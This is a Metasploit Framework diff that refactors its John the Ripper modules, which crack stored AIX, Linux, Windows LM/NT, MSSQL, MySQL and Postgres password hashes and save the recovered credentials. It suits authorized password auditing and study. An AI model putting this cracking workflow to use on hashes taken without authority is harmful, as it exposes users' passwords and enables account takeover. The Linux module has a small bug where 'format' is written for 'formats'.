+
+  # Need 3+ for ActiveSupport::Concern
+  spec.add_runtime_dependency 'activesupport', '>= 3.0.0', rails_version_constraint
+  # Needed for config.action_view for view plugin compatibility for Pro
+  spec.add_runtime_dependency 'actionpack', rails_version_constraint
+  # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
+  spec.add_runtime_dependency 'bcrypt'
+  # Needed for some admin modules (scrutinizer_add_user.rb)
+  spec.add_runtime_dependency 'json'
+  # Things that would normally be part of the database model, but which
+  # are needed when there's no database
+  spec.add_runtime_dependency 'metasploit-model', '~> 0.26.1'
+  # Needed for Meterpreter on Windows, soon others.
+  spec.add_runtime_dependency 'meterpreter_bins', '0.0.6'
+  # Needed by msfgui and other rpc components
+  spec.add_runtime_dependency 'msgpack'
+  # Needed by anemone crawler
+  spec.add_runtime_dependency 'nokogiri'
+  # Needed by db.rb and Msf::Exploit::Capture
+  spec.add_runtime_dependency 'packetfu', '1.1.9'
+  # Run initializers for metasploit-concern, metasploit-credential, metasploit_data_models Rails::Engines
+  spec.add_runtime_dependency 'railties'
+  # Needed by JSObfu
+  spec.add_runtime_dependency 'rkelly-remix', '0.0.6'
+  # Needed by anemone crawler
+  spec.add_runtime_dependency 'robots'
+  # Needed by some modules
+  spec.add_runtime_dependency 'rubyzip', '~> 1.1'
+  # Needed for some post modules
+  spec.add_runtime_dependency 'sqlite3'
+  # required for Time::TZInfo in ActiveSupport
+  spec.add_runtime_dependency 'tzinfo'
+end
diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb
index cbe3c02004..3b60d618c1 100644
--- a/modules/auxiliary/analyze/jtr_aix.rb
+++ b/modules/auxiliary/analyze/jtr_aix.rb
@@ -5,6 +5,7 @@
 
 
 require 'msf/core'
+require 'msf/core/auxiliary/jtr'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -28,67 +29,67 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    wordlist = Rex::Quickfile.new("jtrtmp")
-    begin
-      wordlist.write( build_seed().join("\n") + "\n" )
-    ensure
-      wordlist.close
-    end
+    cracker = new_john_cracker
 
-    myloots = myworkspace.loots.find(:all, :conditions => ['ltype=?', 'aix.hashes'])
-    return if myloots.nil? or myloots.empty?
+    #generate our wordlist and close the file handle
+    wordlist = wordlist_file
+    wordlist.close
+    print_status "Wordlist file written out to #{wordlist.path}"
+    cracker.wordlist = wordlist.path
+    cracker.hash_path = hash_file
 
-    loot_data = ''
-
-    myloots.each do |myloot|
-      usf = ''
-      begin
-        File.open(myloot.path, "rb") do |f|
-          usf = f.read
-        end
-      rescue Exception => e
-        print_error("Unable to read #{myloot.path} \n #{e}")
-        next
+    ['des'].each do |format|
+      # dupe our original cracker so we can safely change options between each run
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+      print_status "Cracking #{format} hashes in normal wordlist mode..."
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
-      usf.each_line do |row|
-        row.gsub!(/\n/, ":#{myloot.host.address}\n")
-        loot_data << row
+
+      print_status "Cracking #{format} hashes in single mode..."
+      cracker_instance.rules = 'single'
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
-    end
 
-    hashlist = Rex::Quickfile.new("jtrtmp")
-    hashlist.write(loot_data)
-    hashlist.close
-
-    print_status("HashList: #{hashlist.path}")
-
-    print_status("Trying Format:des Wordlist: #{wordlist.path}")
-    john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'des')
-    print_status("Trying Format:des Rule: All4...")
-    john_crack(hashlist.path, :incremental => "All4", :format => 'des')
-    print_status("Trying Format:des Rule: Digits5...")
-    john_crack(hashlist.path, :incremental => "Digits5", :format => 'des')
-
-    cracked = john_show_passwords(hashlist.path)
-
-
-    print_status("#{cracked[:cracked]} hashes were cracked!")
-
-    cracked[:users].each_pair do |k,v|
-      if v[0] == "NO PASSWORD"
-        passwd=""
-      else
-        passwd=v[0]
+      print_status "Cracking #{format} hashes in incremental mode (Digits)..."
+      cracker_instance.rules = nil
+      cracker_instance.wordlist = nil
+      cracker_instance.incremental = 'Digits'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
+
+      print_status "Cracked Passwords this run:"
+      cracker_instance.each_cracked_password do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        next unless fields.count >=3
+        username = fields.shift
+        core_id  = fields.pop
+        password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them
+        print_good password_line
+        create_cracked_credential( username: username, password: password, core_id: core_id)
       end
-      print_good("Host: #{v.last}  User: #{k} Pass: #{passwd}")
-      report_auth_info(
-        :host  => v.last,
-        :port => 22,
-        :sname => 'ssh',
-        :user => k,
-        :pass => passwd
-      )
     end
   end
 
+  def hash_file
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    Metasploit::Credential::NonreplayableHash.joins(:cores).where(metasploit_credential_cores: { workspace_id: myworkspace.id }, jtr_format: 'des').each do |hash|
+      hash.cores.each do |core|
+        user = core.public.username
+        hash_string = "#{hash.data}"
+        id = core.id
+        hashlist.puts "#{user}:#{hash_string}:#{id}:"
+      end
+    end
+    hashlist.close
+    print_status "Hashes Written out to #{hashlist.path}"
+    hashlist.path
+  end
+
 end
diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb
index 0c281b27b3..57d02cb2bc 100644
--- a/modules/auxiliary/analyze/jtr_crack_fast.rb
+++ b/modules/auxiliary/analyze/jtr_crack_fast.rb
@@ -5,6 +5,7 @@
 
 
 require 'msf/core'
+require 'msf/core/auxiliary/jtr'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -27,132 +28,102 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    wordlist = Rex::Quickfile.new("jtrtmp")
-    hashlist = Rex::Quickfile.new("jtrtmp")
+    cracker = new_john_cracker
 
-    begin
-      # Seed the wordlist with usernames, passwords, and hostnames
-      seed = []
+    # generate our wordlist and close the file handle
+    wordlist = wordlist_file
+    wordlist.close
+    print_status "Wordlist file written out to #{wordlist.path}"
+    cracker.wordlist = wordlist.path
+    cracker.hash_path = hash_file
 
-      myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
-      myworkspace.creds.each do |o|
-        seed << john_expand_word( o.user ) if o.user
-        seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
+    ['lm','nt'].each do |format|
+      # dupe our original cracker so we can safely change options between each run
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+      print_status "Cracking #{format} hashes in normal wordlist mode..."
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
 
-      # Grab any known passwords out of the john.pot file
-      john_cracked_passwords.values {|v| seed << v }
-
-      # Write the seed file
-      wordlist.write( seed.flatten.uniq.join("\n") + "\n" )
-
-      print_status("Seeded the password database with #{seed.length} words...")
-
-      # Append the standard JtR wordlist as well
-      ::File.open(john_wordlist_path, "rb") do |fd|
-        wordlist.write fd.read(fd.stat.size)
+      print_status "Cracking #{format} hashes in single mode..."
+      cracker_instance.rules = 'single'
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
 
-      # Close the wordlist to prevent sharing violations (windows)
-      wordlist.close
-
-      # Create a PWDUMP style input file for SMB Hashes
-      smb_hashes = myworkspace.creds.select{|x| x.ptype == "smb_hash" }
-      smb_hashes.each do |cred|
-        hashlist.write( "cred_#{cred[:id]}:#{cred[:id]}:#{cred[:pass]}:::\n" )
-      end
-      hashlist.close
-
-      if smb_hashes.length > 0
-        cracked_ntlm = {}
-        cracked_lm   = {}
-        added        = []
-
-        john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'lm')
-        john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'nt')
-
-        # Crack this in LANMAN format using wordlist mode with tweaked rules
-        john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
-
-        # Crack this in LANMAN format using various incremntal modes
-        john_crack(hashlist.path, :incremental => "All4", :format => 'lm')
-        john_crack(hashlist.path, :incremental => "Digits5", :format => 'lm')
-
-        # Parse cracked passwords and permute LANMAN->NTLM as needed
-        cracked = john_show_passwords(hashlist.path, 'lm')
-        cracked[:users].each_pair do |k,v|
-          next if v == ""
-          next if (v[0,7] == "???????" or v[7,7] == "???????")
-          next if not k =~ /^cred_(\d+)/m
-          cid  = $1.to_i
-
-          cracked_lm[k] = v
-
-          cred_find = smb_hashes.select{|x| x[:id] == cid}
-          next if cred_find.length == 0
-
-          cred = cred_find.first
-          ntlm = cred.pass.split(":", 2).last
-          done = john_lm_upper_to_ntlm(v, ntlm)
-          cracked_ntlm[k] = done if done
-        end
-
-        # Append any cracked values to the wordlist
-        tfd = ::File.open(wordlist.path, "ab")
-        cracked_lm.values.each   {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
-        cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
-        tfd.close
-
-        # Crack this in NTLM format
-        john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'nt')
-
-        # Crack this in NTLM format using various incremntal modes
-        john_crack(hashlist.path, :incremental => "All4", :format => 'nt')
-        john_crack(hashlist.path, :incremental => "Digits5", :format => 'nt')
-
-        # Parse cracked passwords
-        cracked = john_show_passwords(hashlist.path, 'nt')
-        cracked[:users].each_pair do |k,v|
-          next if cracked_ntlm[k]
-          cracked_ntlm[k] = v
-        end
-
-        # Append any cracked values to the wordlist
-        tfd = ::File.open(wordlist.path, "ab")
-        cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
-        tfd.close
-
-        # Store the cracked results based on user_id => cred.id
-        cracked_ntlm.each_pair do |k,v|
-          next if not k =~ /^cred_(\d+)/m
-          cid = $1.to_i
-
-          cred_find = smb_hashes.select{|x| x[:id] == cid}
-          next if cred_find.length == 0
-          cred = cred_find.first
-          next if cred.user.to_s.strip.length == 0
-
-          print_good("Cracked: #{cred.user}:#{v} (#{cred.service.host.address}:#{cred.service.port})")
-          report_auth_info(
-            :host  => cred.service.host,
-            :service => cred.service,
-            :user  => cred.user,
-            :pass  => v,
-            :type  => "password",
-            :source_id   => cred[:id],
-            :source_type => 'cracked'
-          )
+      if format == 'lm'
+        print_status "Cracking #{format} hashes in incremental mode (All4)..."
+        cracker_instance.rules = nil
+        cracker_instance.wordlist = nil
+        cracker_instance.incremental = 'All4'
+        cracker_instance.crack do |line|
+          print_status line.chomp
         end
       end
 
-      # XXX: Enter other hash types here (shadow, etc)
+      print_status "Cracking #{format} hashes in incremental mode (Digits)..."
+      cracker_instance.rules = nil
+      cracker_instance.wordlist = nil
+      cracker_instance.incremental = 'Digits'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
 
-    rescue ::Timeout::Error
-    ensure
-      wordlist.close rescue nil
-      hashlist.close rescue nil
-      ::File.unlink(wordlist.path) rescue nil
-      ::File.unlink(hashlist.path) rescue nil
+      print_status "Cracked Passwords this run:"
+      cracker_instance.each_cracked_password do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        next unless fields.count >=7
+        username = fields.shift
+        core_id = fields.pop
+
+        # pop off dead space here
+        2.times{ fields.pop }
+
+        # get the NT and LM hashes
+        nt_hash = fields.pop
+        lm_hash = fields.pop
+        password = fields.join(':')
+
+        if format == 'lm'
+          if password.blank?
+            if nt_hash == Metasploit::Credential::NTLMHash::BLANK_NT_HASH
+              password = ''
+            else
+              next
+            end
+          end
+          password = john_lm_upper_to_ntlm(password, nt_hash)
+          # password can be nil if the hash is broken (i.e., the NT and
+          # LM sides don't actually match) or if john was only able to
+          # crack one half of the LM hash. In the latter case, we'll
+          # have a line like:
+          #  username:???????WORD:...:...:::
+          next if password.nil?
+        end
+
+        print_good "#{username}:#{password}:#{core_id}"
+        create_cracked_credential( username: username, password: password, core_id: core_id)
+      end
     end
   end
+
+  def hash_file
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    Metasploit::Credential::NTLMHash.joins(:cores).where(metasploit_credential_cores: { workspace_id: myworkspace.id } ).each do |hash|
+      hash.cores.each do |core|
+        user = core.public.username
+        hash_string = "#{hash.data}"
+        id = core.id
+        hashlist.puts "#{user}:#{id}:#{hash_string}:::#{id}"
+      end
+    end
+    hashlist.close
+    print_status "Hashes Written out to #{hashlist.path}"
+    hashlist.path
+  end
 end
diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb
index 452abf99dc..5e124b513d 100644
--- a/modules/auxiliary/analyze/jtr_linux.rb
+++ b/modules/auxiliary/analyze/jtr_linux.rb
@@ -5,6 +5,7 @@
 
 
 require 'msf/core'
+require 'msf/core/auxiliary/jtr'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -36,77 +37,62 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @wordlist = Rex::Quickfile.new("jtrtmp")
 
-    begin
-      @wordlist.write( build_seed().join("\n") + "\n" )
-    ensure
-      @wordlist.close
+    formats = [ 'md5', 'des', 'bsdi']
+    if datastore['Crypt']
+      format << 'crypt'
     end
 
-    myloots = myworkspace.loots.where('ltype=?', 'linux.hashes')
-    return if myloots.nil? or myloots.empty?
+    cracker = new_john_cracker
 
-    build_hashlist(myloots)
+    #generate our wordlist and close the file handle
+    wordlist = wordlist_file
+    wordlist.close
+    print_status "Wordlist file written out to #{wordlist.path}"
+    cracker.wordlist = wordlist.path
+    cracker.hash_path = hash_file
 
-    print_status("HashList: #{@hashlist.path}")
-
-    try('md5')
-    try('des')
-    try('bsdi')
-    try('crypt') if datastore['Crypt']
-
-    cracked = john_show_passwords(@hashlist.path)
-
-    print_status("#{cracked[:cracked]} hashes were cracked!")
-
-    cracked[:users].each_pair do |k,v|
-      if v[0] == "NO PASSWORD"
-        passwd=""
-      else
-        passwd=v[0]
+    formats.each do |format|
+      # dupe our original cracker so we can safely change options between each run
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+      print_status "Cracking #{format} hashes in normal wordlist mode..."
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
+
+      print_status "Cracked Passwords this run:"
+      cracker_instance.each_cracked_password do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        next unless fields.count >=7
+        username = fields.shift
+        core_id  = fields.pop
+        4.times { fields.pop }
+        password = fields.join('') # Anything left must be the password. This accounts for passwords with : in them
+        print_good password_line
+        create_cracked_credential( username: username, password: password, core_id: core_id)
       end
-      print_good("Host: #{v.last}  User: #{k} Pass: #{passwd}")
-      report_auth_info(
-        :host  => v.last,
-        :port => 22,
-        :sname => 'ssh',
-        :user => k,
-        :pass => passwd
-      )
     end
   end
 
-  def try(format)
-    print_status("Trying Format:#{format} Wordlist: #{@wordlist.path}")
-    john_crack(@hashlist.path, :wordlist => @wordlist.path, :rules => 'single', :format => format)
-    print_status("Trying Format:#{format} Rule: All4...")
-    john_crack(@hashlist.path, :incremental => "All4", :format => format)
-    print_status("Trying Format:#{format} Rule: Digits5...")
-    john_crack(@hashlist.path, :incremental => "Digits5", :format => format)
-  end
-
-  def build_hashlist(myloots)
-    loot_data = []
-
-    myloots.each do |myloot|
-      usf = ''
-      begin
-        File.open(myloot.path, "rb") do |f|
-          usf = f.read(f.stat.size)
-        end
-      rescue Exception => e
-        print_error("Unable to read #{myloot.path} \n #{e}")
-      end
-      usf.each_line do |row|
-        row.gsub!("\n", ":#{myloot.host.address}\n")
-        loot_data << row
+  def hash_file
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    Metasploit::Credential::NonreplayableHash.joins(:cores).where(metasploit_credential_cores: { workspace_id: myworkspace.id }, jtr_format: 'md5,des,bsdi,crypt').each do |hash|
+      hash.cores.each do |core|
+        user = core.public.username
+        hash_string = "#{hash.data}"
+        id = core.id
+        hashlist.puts "#{user}:#{hash_string}:::::#{id}:"
       end
     end
-
-    @hashlist = Rex::Quickfile.new("jtrtmp")
-    @hashlist.write(loot_data.join)
-    @hashlist.close
+    hashlist.close
+    print_status "Hashes Written out to #{hashlist.path}"
+    hashlist.path
   end
 
+
+
 end
diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb
index a1d9d8ba2c..56c88b67bc 100644
--- a/modules/auxiliary/analyze/jtr_mssql_fast.rb
+++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb
@@ -5,6 +5,7 @@
 
 
 require 'msf/core'
+require 'msf/core/auxiliary/jtr'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -28,62 +29,70 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @wordlist = Rex::Quickfile.new("jtrtmp")
+    @formats = Set.new
+    cracker = new_john_cracker
 
-    @wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
-    @wordlist.close
-    print_status("Cracking MSSQL Hashes")
-    crack("mssql")
-    print_status("Cracking MSSQL05 Hashes")
-    crack("mssql05")
+    #generate our wordlist and close the file handle
+    wordlist = wordlist_file
+    wordlist.close
+    print_status "Wordlist file written out to #{wordlist.path}"
+    cracker.wordlist = wordlist.path
+    cracker.hash_path = hash_file
 
-  end
-
-
-
-
-  def crack(format)
-
-    hashlist = Rex::Quickfile.new("jtrtmp")
-    ltype= "#{format}.hashes"
-    myloots = myworkspace.loots.where('ltype=?', ltype)
-    unless myloots.nil? or myloots.empty?
-      myloots.each do |myloot|
-        begin
-          mssql_array = CSV.read(myloot.path).drop(1)
-        rescue Exception => e
-          print_error("Unable to read #{myloot.path} \n #{e}")
-        end
-        mssql_array.each do |row|
-          hashlist.write("#{row[0]}:0x#{row[1]}:#{myloot.host.address}:#{myloot.service.port}\n")
-        end
+    @formats.each do |format|
+      # dupe our original cracker so we can safely change options between each run
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+      print_status "Cracking #{format} hashes in normal wordlist mode..."
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
-      hashlist.close
 
-      print_status("HashList: #{hashlist.path}")
-      print_status("Trying Wordlist: #{@wordlist.path}")
-      john_crack(hashlist.path, :wordlist => @wordlist.path, :rules => 'single', :format => format)
+      print_status "Cracking #{format} hashes in single mode..."
+      cracker_instance.rules = 'single'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
 
-      print_status("Trying Rule: All4...")
-      john_crack(hashlist.path, :incremental => "All4", :format => format)
+      print_status "Cracking #{format} hashes in incremental mode (Digits)..."
+      cracker_instance.incremental = 'Digits'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
 
-      print_status("Trying Rule: Digits5...")
-      john_crack(hashlist.path, :incremental => "Digits5", :format => format)
-
-      cracked = john_show_passwords(hashlist.path, format)
-
-      print_status("#{cracked[:cracked]} hashes were cracked!")
-      cracked[:users].each_pair do |k,v|
-        print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
-        report_auth_info(
-          :host  => v[1],
-          :port => v[2],
-          :sname => 'mssql',
-          :user => k,
-          :pass => v[0]
-        )
+      print_status "Cracked Passwords this run:"
+      cracker_instance.each_cracked_password do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        next unless fields.count >=3
+        username = fields.shift
+        core_id  = fields.pop
+        password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them
+        print_good password_line
+        create_cracked_credential( username: username, password: password, core_id: core_id)
       end
     end
+
   end
 
+  def hash_file
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    Metasploit::Credential::NonreplayableHash.joins(:cores).where(metasploit_credential_cores: { workspace_id: myworkspace.id }, jtr_format: ['mssql', 'mssql05', 'mssql12']).each do |hash|
+      # Track the formats that we've seen so we do not attempt a format that isn't relevant
+      @formats << hash.jtr_format
+      hash.cores.each do |core|
+        user = core.public.username
+        hash_string = "#{hash.data}"
+        id = core.id
+        hashlist.puts "#{user}:#{hash_string}:#{id}:"
+      end
+    end
+    hashlist.close
+    print_status "Hashes Written out to #{hashlist.path}"
+    hashlist.path
+  end
+
+
 end
diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb
index 488c6c7e36..cf5d28e1a3 100644
--- a/modules/auxiliary/analyze/jtr_mysql_fast.rb
+++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb
@@ -5,6 +5,7 @@
 
 
 require 'msf/core'
+require 'msf/core/auxiliary/jtr'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -28,81 +29,64 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    wordlist = Rex::Quickfile.new("jtrtmp")
+    cracker = new_john_cracker
 
-    wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
+    #generate our wordlist and close the file handle
+    wordlist = wordlist_file
     wordlist.close
+    print_status "Wordlist file written out to #{wordlist.path}"
+    cracker.wordlist = wordlist.path
+    cracker.hash_path = hash_file
 
-    hashlist = Rex::Quickfile.new("jtrtmp")
-
-    myloots = myworkspace.loots.where('ltype=?', 'mysql.hashes')
-    unless myloots.nil? or myloots.empty?
-      myloots.each do |myloot|
-        begin
-          mssql_array = CSV.read(myloot.path).drop(1)
-        rescue Exception => e
-          print_error("Unable to read #{myloot.path} \n #{e}")
-        end
-        mssql_array.each do |row|
-          hashlist.write("#{row[0]}:#{row[1]}:#{myloot.host.address}:#{myloot.service.port}\n")
-        end
-      end
-      hashlist.close
-
-      print_status("HashList: #{hashlist.path}")
-      print_status("Trying 'mysql-fast' Wordlist: #{wordlist.path}")
-      john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'mysql-fast')
-
-      print_status("Trying 'mysql-fast' Rule: All4...")
-      john_crack(hashlist.path, :incremental => "All4", :format => 'mysql-fast')
-
-      print_status("Trying mysql-fast Rule: Digits5...")
-      john_crack(hashlist.path, :incremental => "Digits5", :format => 'mysql-fast')
-
-      cracked = john_show_passwords(hashlist.path, 'mysql-fast')
-
-      print_status("#{cracked[:cracked]} hashes were cracked!")
-
-      #Save cracked creds and add the passwords back to the wordlist for the next round
-      tfd = ::File.open(wordlist.path, "ab")
-      cracked[:users].each_pair do |k,v|
-        print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
-        tfd.write( v[0] + "\n" )
-        report_auth_info(
-          :host  => v[1],
-          :port => v[2],
-          :sname => 'mssql',
-          :user => k,
-          :pass => v[0]
-        )
+    ['mysql','mysql-sha1'].each do |format|
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+      print_status "Cracking #{format} hashes in normal wordlist mode..."
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
 
-      print_status("Trying 'mysql-sha1' Wordlist: #{wordlist.path}")
-      john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'mysql-sha1')
-
-      print_status("Trying 'mysql-sha1' Rule: All4...")
-      john_crack(hashlist.path, :incremental => "All4", :format => 'mysql-sha1')
-
-      print_status("Trying 'mysql-sha1' Rule: Digits5...")
-      john_crack(hashlist.path, :incremental => "Digits5", :format => 'mysql-sha1')
-
-      cracked = john_show_passwords(hashlist.path, 'mysql-sha1')
-
-      print_status("#{cracked[:cracked]} hashes were cracked!")
-
-      cracked[:users].each_pair do |k,v|
-        print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
-        report_auth_info(
-          :host  => v[1],
-          :port => v[2],
-          :sname => 'mssql',
-          :user => k,
-          :pass => v[0]
-        )
+      print_status "Cracking #{format} hashes in single mode..."
+      cracker_instance.rules = 'single'
+      cracker_instance.crack do |line|
+        print_status line.chomp
       end
 
+      print_status "Cracking #{format} hashes in incremental mode (Digits)..."
+      cracker_instance.incremental = 'Digits'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
+
+      print_status "Cracked Passwords this run:"
+      cracker_instance.each_cracked_password do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        next unless fields.count >=3
+        username = fields.shift
+        core_id  = fields.pop
+        password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them
+        print_good password_line
+        create_cracked_credential( username: username, password: password, core_id: core_id)
+      end
     end
+  end
 
+  def hash_file
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    Metasploit::Credential::NonreplayableHash.joins(:cores).where(metasploit_credential_cores: { workspace_id: myworkspace.id }, jtr_format: 'mysql,mysql-sha1').each do |hash|
+      hash.cores.each do |core|
+        user = core.public.username
+        hash_string = "#{hash.data}"
+        id = core.id
+        hashlist.puts "#{user}:#{hash_string}:#{id}:"
+      end
+    end
+    hashlist.close
+    print_status "Hashes Written out to #{hashlist.path}"
+    hashlist.path
   end
 
 
diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb
new file mode 100644
index 0000000000..9b7403422c
--- /dev/null
+++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/auxiliary/jtr'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+  #Included to grab the john.pot and use some utiltiy functions
+  include Msf::Auxiliary::JohnTheRipper
+
+  def initialize
+    super(
+        'Name'           => 'John the Ripper Postgres SQL Password Cracker',
+        'Description'    => %Q{
+          This module uses John the Ripper to attempt to crack Postgres password
+          hashes, gathered by the postgres_hashdump module. It is slower than some of the other
+          JtR modules because it has to do some wordlist manipulation to properly handle postgres'
+          format.
+      },
+        'Author'         => ['theLightCosine'],
+        'License'        => MSF_LICENSE
+    )
+
+  end
+
+  def run
+    @username_set = Set.new
+
+    cracker = new_john_cracker
+
+    hash_list = hash_file
+
+    #generate our wordlist and close the file handle
+    wordlist = wordlist_file
+    wordlist.close
+
+
+    print_status "Wordlist file written out to #{wordlist.path}"
+    cracker.wordlist = wordlist.path
+    cracker.hash_path = hash_list
+
+    ['raw-md5'].each do |format|
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+      print_status "Cracking #{format} hashes in normal wordlist mode..."
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
+
+      print_status "Cracking #{format} hashes in single mode..."
+      cracker_instance.rules = 'single'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
+
+      print_status "Cracking #{format} hashes in incremental mode (Digits)..."
+      cracker_instance.incremental = 'Digits'
+      cracker_instance.crack do |line|
+        print_status line.chomp
+      end
+
+      print_status "Cracked Passwords this run:"
+      cracker_instance.each_cracked_password do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        next unless fields.count >=3
+        username = fields.shift
+        core_id  = fields.pop
+        password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them
+
+        # Postgres hashes always prepend the username to the password before hashing. So we strip the username back off here.
+        password.gsub!(/^#{username}/,'')
+        print_good "#{username}:#{password}:#{core_id}"
+        create_cracked_credential( username: username, password: password, core_id: core_id)
+      end
+    end
+
+  end
+
+  # Override the mixin method to add prependers
+  def wordlist_file
+    return nil unless framework.db.active
+    wordlist = Metasploit::Framework::JtR::Wordlist.new(
+        prependers: @username_set,
+        custom_wordlist: datastore['CUSTOM_WORDLIST'],
+        mutate: datastore['MUTATE'],
+        use_creds: datastore['USE_CREDS'],
+        use_db_info: datastore['USE_DB_INFO'],
+        use_default_wordlist: datastore['USE_DEFAULT_WORDLIST'],
+        use_hostnames: datastore['USE_HOSTNAMES'],
+        use_common_root: datastore['USE_ROOT_WORDS'],
+        workspace: myworkspace
+    )
+    wordlist.to_file
+  end
+
+  def hash_file
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    Metasploit::Credential::NonreplayableHash.joins(:cores).where(metasploit_credential_cores: { workspace_id: myworkspace.id }, jtr_format: 'raw-md5,postgres').each do |hash|
+      hash.cores.each do |core|
+        user = core.public.username
+        @username_set << user
+        hash_string = "#{hash.data}"
+        id = core.id
+        hashlist.puts "#{user}:#{hash_string}:#{id}:"
+      end
+    end
+    hashlist.close
+    print_status "Hashes Written out to #{hashlist.path}"
+    hashlist.path
+  end
+
+end
diff --git a/modules/auxiliary/analyze/jtr_unshadow.rb b/modules/auxiliary/analyze/jtr_unshadow.rb
index b46d2f9b01..13a19ed202 100644
--- a/modules/auxiliary/analyze/jtr_unshadow.rb
+++ b/modules/auxiliary/analyze/jtr_unshadow.rb
@@ -8,8 +8,6 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
 
-  include Msf::Auxiliary::JohnTheRipper
-
   def initialize
     super(
       'Name'              => 'Unix Unshadow Utility',
@@ -30,14 +28,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-
-    unshadow = john_unshadow(datastore['PASSWD_PATH'],datastore['SHADOW_PATH'])
-    if unshadow
-      print_good(unshadow)
-      filename= "#{datastore['IP']}_Linux_Hashes.txt"
-      lootfile = store_loot("linux.hashes", "text/plain", datastore['IP'], unshadow, filename, "Linux Hashes")
-      print_status("Saved unshadowed file: #{lootfile}")
-    end
+    print_error "This module is deprecated and does nothing. It will be removed in the next release!"
   end
 
 end
